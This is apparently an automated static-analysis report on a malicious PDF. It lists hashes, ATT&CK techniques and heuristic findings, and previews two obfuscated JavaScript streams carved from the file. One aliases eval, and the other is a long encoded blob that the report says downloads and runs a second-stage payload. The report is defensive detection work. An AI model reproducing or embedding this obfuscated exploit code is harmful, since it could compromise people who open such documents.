Malicious PDF — malware analysis report

Static analysis result for SHA-256 60168031c87b6d9c…

MALICIOUS

PDF

3.8 KB
MD5: dccb1f12839e6d23b14fbc9eb64b9321 SHA-1: dfbfd45418d4a6efb29451024508080d29ab1e67 SHA-256: 60168031c87b6d9caa18ce7cd7ea50512493ee9adb52af34919498b31a2459ad
156 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript streams that are heavily obfuscated and utilize eval() and String.fromCharCode() for execution. The critical PDF_JS_EXPLOIT_CLUSTER heuristic indicates a known exploit pattern. The embedded JavaScript is designed to download and execute a second-stage payload, as evidenced by the heuristic firings and the nature of the script content.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111711_000.js
6df1f3dcb55caf821b05c3cbbb423b0efe371aa7bed290634e3a35e8df494300		 pdf-javascript-stream PDF /JS object 111711 at offset 0x197 372 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/ eval('/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/hlhtetk/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/=/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/eval;/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/'); /*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/
javascript_obj111712_001.js
6daa439336a30a8347c7fde75caec04ce7b1144b4e3759318b3f051961ee507a		 pdf-javascript-stream PDF /JS object 111712 at offset 0x248 5206 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
ktiuilf="0P0j1F1Q1e2c1c3L1_1`2U301T1W1Z3G1X2Y2e1U333E1R2Q381M1N272_1K3P1I3d1G3f3h101C2J1A3X1=1>3+3-191:3.3113163g143A3e113:3;1,1-2b2h1*3Y3^0b0g2Z0e3M0c2S3N0[0_3K0]2^2f0Y3O0W3S0U2X0S3c0Q373?/e0C0L3`0H0I24230F3_0D3U3b070@2a0>3Z0<3Q0:3W083I3[052`032R013R0-0.2V2W/h0*3T/i353@/f2T3=/_/b2O/`2[2d/Z/[2]3V/X3]/V3a/R/S2L2P/P2g3/";cpfljni8="iCcKgdF_9C/PU3N@dE@;B]`6MDU@].;Z6K.;6L]e3N8A*`N7D;I2R4S6J?.D]-*73N*,;@:LK>]-.*/N6A_U2/:*@:c3*C**NbN7,LSN,R+I2*.BU2D>4P;B]`6L^JQC,2PVK72P:.6da:PKAC,2LC-KN`N5_F-2;.`N@0;6J0f8]*DF^2VdA6K.=@;EL3N*<J6K.;6JBC.]+AEWN2LD]*E;6J0Q6]58?^2;.`N7D;6K7->]*6?^2DWW@:Q47C,2LC*Z:.]-+>=2*+4C-A74]1+,_]/>Ff2DcJX:-D3N*_dP:5CA6K.=P;EL3NEV67N3Tb6K.;6K^*E]/F+U2=ON].;.]53EP;XZZa:PU>].;.].<M6K.R^2FZ0gKA*D].`Ca:L2P:-GXC*78CN0*?^2;.dN@cLC,3;P:XJZa:OT6]16+Y2?Z0VK7@GN2L3N--@dN@CXa:L3U2+W.]*DF^2VdA6K.=@;EL3N*<J6K.;6JBC.]+AEWN2LD]*E;6J0Q6]58?^2;.`N7D;6K7->]*6?^2DWW@:Q48].;.]+JJ3N0,RP:*,>]0XD?N8,/SN4Rda:`[+FJ0_=2+S^6J@]XC,2Q6Lb.=2bBBE2=?XC,2LC-P*bN4c-@:Q53N2L3N@<b6MGKKVK7@SN2L3N2O0C,3;P:dJ7d,X*`N3T^VK.;6J0fF]*DF^2C;A6K.=P;EL3N2O0C,e--C,@R^2FZ0gKA*D].`Ca:L2P:67EP;CPfC,2PVMDe3N@0VYN@CCa;B4agK=?JC,2LC,2LC,2LC,2LC,2LC,2LC,2LC,2LC/5,PC/K=+FLLh5C/N6=26/SU2/`:0:4S.]4DR7N,TR5N>d=H;=;Q6J^CQ6K./`N>V4CN@:ZA2R6C^2/`;U2R5:A2SB^P:B_B`N@6;6LMTE]-*,a]47>WN++2P:7Z0gJBZ0gK<73N0@Bf2dVCI2+VB^2D_7Y2,FS6K.D?N2L3N+@;U2=PJVK.;6KLh4C*52`N3^:@:L2P:BJ*VJ-;J6M<O>]*U2`N3^:@:L2P:.X+I2=PKVK.;6K0P5d0JJ@].;8C-*N=2;SLi;R2/VK.=P;C.=2BXZ52+C0VK8D,].;.]58B/N5K7D]5>BYN*VM@:Q7+C,2LC,T*bN5P*bN-4WU2C:CU26/WY2Vd+FKZ:U@;C^Wd,iWWC,78=2cB,a:L3^2D_LC0e->]05_SN8;@VK0NdND0+E2;.dN*aLC-/`>]*@;U2=PJVK.;6KZ<PVK._P:L2P:L2P:L2P:L2P:L2P:L2P:L2P:-D3ND,+E2;.dN@RLC-J@6]+KU*]+KKKVL^U-C,DB/N*;=VJ23Sa:Q-+FK]fJVL`O7C*TUF]+;K?gMMKAC*TK;FK./?N@dDa:444U266R7N>?;a;=?+VLZW+FJ@O+VLLTE]+G>WN02LC/4>/]-.6WNFG:A26+<a:L>WN0FR`N07>`NFG:0;:+LC,2BJHEiCcKgdI;SgdF6-a:B5:0:BKJX;Z7D56JZ^JEN>/6`N0FS=26Ddjd/,aPVLO4@]4/W7C19iOVLJE;U2c0_5P;^jR@d/*03N7+SLC-;FSY2;0KFMD2JHEiCcKgdIKSgdF6-a:B5:0:BKJX;Z7D56JZ^JEN>/6`N0FS=26Ddjd/,aPVLO4@]4/W7C19iOVLJE;U2c0_5P;^jR@d/*03N7+SLC-;FSY2;0UC0_;*gbg^[-d]f;SgdF6-a:B5:0:BKJX;Z7D56JZ^JEN>/6`N0FS=26Ddjd/,aPVLO4@]4/W7C19iOVLJE;U2c0_5P;^jR@d/*03N7+SLC-;FSY2;0TC0_;*ga7+<SQMLL-99`HHPX16gI?I,GF>V9,<.39Y9GF<cF^[h=fULT_`cOj.c=i3`[<Zg32:K,-PH9T200N16gI>a32:Ji32:JdQMeL0N16gI>i9J2iE^[?Dd5c=ULL+]3[CV<:K98PM[;+^91`7L<-cNJ_/4PH842RfY@+A5,<-ZNK,I6g<XGA?dQY61.72>eH:VhdJedCV<:K9PH2S;-<2j2S/2S/7L<.3g^[05Ui2D;1c?.;.E.N2=dQL?61G8BX:_N/89>]S`[gdI<^BNK,I6g:h?HecRKS4P-XQ6AIGF?@PY.YcQ0[3,.iCcQA/.72[GI[5e<ch?HecRJB;1dR,^BNK,I6g:F^[h;-<:>ch=4QAIP;W7SNE=DIL^BNK,-PH9T2D:CdiU^_`ZdQMeUc=ULOP[3,.iCcLMR4Pc:_O]O.YS.IK>;.;BJFL6AAga32:J[bLAI6g;;_/=.72MC/1:?6=i2Re,SX7N>G+>[*Z62V9,<.2:OFeXU^9HB8-W;_/=+Z:_JdQMeL+K4P-XQ6AE.N2:I.N2=dQL1I8g7_eH:_N/89>]S`bdN2S/C,4;AcVa32:Nigh`[5MYQH0eG9IGF?@PY.jL,LfW[BH8iGcES_gJBD:fdbKXQ=a[g<:K3U^[d1]MXhB/Ig[bQ.72@QGeZ3gRfYA4PjedMb:e408X1Mc,YZ8IdiAZOFI@-PGgfZb=SciVa329L<-:>TCccROAQLSKUOK3+c<:ReRKS24FHSO=UY^2:V:V].5.56K,[,^2:V:Vj/P[39PH3>ZG_dLd-<:>ch=4QA1^Oi57L<AQ6T,eFTF:_K;`;*ZO=+b=P5WL<+9?JXQ4Q.73+=M`6TGGiC,/L/P:KBKCi57L<AQ6AGchcYEL0NcMBNKhAP-L0NY8BXf[f[Hb.-,AQ6T,eFTFiecTW7HE.NQbQXX3F.h@,eFTFiecTW7H3j.9TgZFV9+9?JXQ4Q.--<+9?JXQ4Q7McNJ^bHKG8?82D:3eV/_d>dgI*;gbQLT`]AZKhAP-OP[3*XQ4Q.72.h@,eFTFi9J2iE^[?Dd5c:3eV/_d>dh`[?DDg<iN9TgZFVa339Y9GF<c5S]S^fULT_`cJB:iU^+[9cL9ZT2L5-ZA=O=L0N,eFTF:62/_d>cJB:CfY:XQ4Q7McNOFeX2D:S_gKCf^+`]^BNJ[bLA9.72MC1LI[7,RMC1L+JB;BHUQ?ZGY+Z:_JA=O=L+K5^P?+G8?8E1[39PH2?/F:_PXEbYHhfbYHhfbYHhJ*************************************************************************************************************************************************************************************************************************************7L<;6h`h?dcTBDfgZ@]2JbdI,/;A57L<-cNJ_/4PH843@G6gRcTdB<:H.NiCcM9H1.72>eH:VhdJedCV<:K1KLA6TTI5Q4I/SbHV,I?Q=+_RcSBH.N2:K9PH3>ZG_dLd-<:>ch=4QA1^OaOP[3,.2=dQLALh?i]2@KgKS4P-XQ6AIGF?@PY.YcQ0[3,.2=dQLGF>:_L9ZT2L2<iNXY/eUhN:W-d*ZL9^:/P[3,.2=dQL-PH9T2D<,Q1TC>efg]7SW6MDE=g@E.N2:K+^91`.726gj?deDcF^[h?g3`[<^BNK,.3g^[4U/OiAeSBBKS5NIN>LN>LLA_L9ZT2L2V:8;.IK>;.;V<:K,.08g<fdQLI?h;IO^G+[-<2a=eYT5gXER83j.TV@AdITOKP]I?h;IO^G+[*Z62V9,<.2:K,6hcF1I`I>AdFb:F1+-<-PH9T20.TB8eF[GV<:K,.1[3,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.